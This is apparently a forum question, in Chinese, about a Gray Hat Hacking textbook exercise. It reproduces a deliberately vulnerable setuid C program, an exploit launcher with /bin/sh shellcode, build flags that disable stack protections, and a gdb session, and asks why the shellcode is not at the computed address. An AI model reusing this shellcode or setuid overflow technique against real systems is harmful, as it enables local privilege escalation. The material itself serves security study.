《灰帽黑客(第4版)》第226页,关于利用环境变量实施缓冲区溢出的部分,具体代码如下:
//smallbuff.c
#include <string.h>
/* Deliberately vulnerable target from the book: copies argv[1] into a 10-byte
 * stack buffer with no length check, so any longer argument overwrites whatever
 * the compiler placed after buff on the stack (typically saved registers and
 * the return address) — the overflow the exercise studies.
 * argv[1] is never checked against argc, so running it without an argument
 * hands NULL to strcpy. main falls off the end without returning a value.
 * The page builds it with -fno-stack-protector and -z execstack, i.e. with the
 * canary and non-executable-stack mitigations that would normally stop this
 * switched off. */
int main(int argc, char *argv[])
{
char buff[10];
strcpy(buff, argv[1]);   /* unbounded copy: the defect under study */
}
//exploit2.c
#include <stdlib.h>
#include <stdio.h>
#include <unistd.h>
#include <string.h>
#define VULN "./smallbuff"   /* path of the target binary built by the page's gcc line */
#define SIZE 160             /* size of p, the single argument handed to VULN */
/* Payload bytes copied from the book: 32-bit x86 machine code (int 0x80 calls)
 * ending in the literal "/bin/sh". It is passed to the target as its only
 * environment string (see env[] in main) and can only execute there because
 * smallbuff is linked with -z execstack; with a normal non-executable stack
 * the process would fault instead. */
char shellcode[] =
"\x31\xc0\x31\xdb\xb0\x17\xcd\x80"
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0"
"\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c"
"\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
/* Launcher from the book: fills p with one repeated 4-byte address, then
 * replaces this process with VULN, giving it p as its single argument and
 * `env` (just the shellcode string) as its whole environment.
 * Declared without a return type (implicit int, pre-C99); argc/argv are unused. */
main(int argc, char **argv)
{
char p[SIZE];
char *env[] = {shellcode, NULL};     /* sole environment string of the new process */
char *vuln[] = {VULN, p, NULL};       /* intended argv for VULN; see the execle note below */
int *ptr, i, addr;
/* Fixed guess at where the new image's top-of-stack strings will start.
 * The value exceeds INT_MAX, so storing it in an int is implementation-defined,
 * and %x below expects an unsigned argument. The guess presumably relies on the
 * stack living at a fixed address (no randomization) — confirm for the host. */
addr = 0xbffffffa - strlen(shellcode) - strlen(VULN);
fprintf(stderr, "[***] using address: %#010x\n", addr);
/* Writing starts 2 bytes into p: 40 iterations x 4 bytes cover p[2..161], two
 * bytes past the end of p (SIZE is 160), and the int* is misaligned — both
 * undefined behaviour that x86 tolerates in practice. Nothing writes a '\0',
 * so execle reads the argument up to the first zero byte, which may lie beyond p. */
ptr = (int*)(p + 2);
for(i=0; i<SIZE; i+=4)
{
//*ptr++ = addr;
*ptr = addr;
ptr++;
}
/* (char*)vuln passes the address of the vuln array itself as argv[0], not
 * VULN; the argument list actually delivered is {that pointer, p, NULL}, so
 * vuln[] is only used for its first element.
 * NOTE(review): the gdb session on this page stops at this call and examines
 * addr in exploit2's own memory, i.e. the environment exploit2 inherited from
 * gdb; `env` is laid out only in the image execle creates, which does not yet
 * exist at that breakpoint. */
execle(vuln[0], (char*)vuln, p, NULL, env);
exit(1);   /* reached only if execle fails */
}
//test.sh:编译
# Build the target with the protections that would otherwise block the exercise turned off:
#   -fno-stack-protector          no stack canary, so the overwrite is not caught before return
#   -z execstack                  stack pages executable; without it the payload cannot run there
#   -mpreferred-stack-boundary=2  4-byte stack alignment, keeping the frame layout the book shows
#   -ggdb                         debug info for the gdb session below
gcc -ggdb -mpreferred-stack-boundary=2 -fno-stack-protector -z execstack -o smallbuff smallbuff.c
# setuid bit: smallbuff then runs with its file owner's privileges rather than
# the caller's, which is the privilege level the overflow reaches
sudo chmod u+s smallbuff
# the launcher itself is built with default flags
gcc -o exploit2 exploit2.c
//执行及结果
>./exploit2
[***] using address: 0xbfffffba
段错误 (核心已转储)
gdb 调试 exploit2
>gdb -q exploit2
(gdb) disass main
Dump of assembler code for function main:
0x08048464 <+0>: push %ebp
0x08048465 <+1>: mov %esp,%ebp
0x08048467 <+3>: push %edi
0x08048468 <+4>: and $0xfffffff0,%esp
0x0804846b <+7>: sub $0x100,%esp
0x08048471 <+13>: mov 0xc(%ebp),%eax
0x08048474 <+16>: mov %eax,0x2c(%esp)
................................
0x08048502 <+158>: mov %eax,0x50(%esp)
0x08048506 <+162>: movl $0x0,0x54(%esp)
0x0804850e <+170>: jmp 0x8048524 <main+192>
0x08048510 <+172>: mov 0x50(%esp),%eax
0x08048514 <+176>: mov 0x58(%esp),%edx
0x08048518 <+180>: mov %edx,(%eax)
0x0804851a <+182>: addl $0x4,0x50(%esp)
0x0804851f <+187>: addl $0x4,0x54(%esp)
0x08048524 <+192>: cmpl $0x9f,0x54(%esp)
0x0804852c <+200>: jle 0x8048510 <main+172>
0x0804852e <+202>: mov 0x3c(%esp),%eax
0x08048532 <+206>: lea 0x48(%esp),%edx
0x08048536 <+210>: mov %edx,0x10(%esp)
0x0804853a <+214>: movl $0x0,0xc(%esp)
0x08048542 <+222>: lea 0x5c(%esp),%edx
0x08048546 <+226>: mov %edx,0x8(%esp)
0x0804854a <+230>: lea 0x3c(%esp),%edx
0x0804854e <+234>: mov %edx,0x4(%esp)
0x08048552 <+238>: mov %eax,(%esp)
0x08048555 <+241>: call 0x80483a0 <execle@plt>
0x0804855a <+246>: movl $0x1,(%esp)
0x08048561 <+253>: call 0x8048370 <exit@plt>
End of assembler dump.
调试过程:
1)设置断点1:
> b *0x0804850e
> run
获得 addr 的值(源代码:addr = 0xbffffffa - strlen(shellcode) - strlen(VULN);),即 shellcode 首址。
addr = 0xbfffffba
2)设置断点2:
> b *0x08048555
> cont
> x /xs 0xbfffffba
0xbfffffba: "ERM=gnome-terminal"
0xbfffffcd: "/home/kkk/test/gray_hat_hacking/11/01/exploit2"
0xbffffffc: ""
0xbffffffd: ""
0xbffffffe: ""
0xbfffffff: ""
0xc0000000: <Address 0xc0000000 out of bounds>
0xc0000000: <Address 0xc0000000 out of bounds>
可见,shellcode 并不在 0xbfffffba 处(gdb 调试发现该处存放的是环境变量的内容)。
问题:
为何shellcode没在以0xbfffffba为起始地址的地方?我是按照书里的例子原样打上去的,
哪里出问题了?有之前调试过这个例子的吗?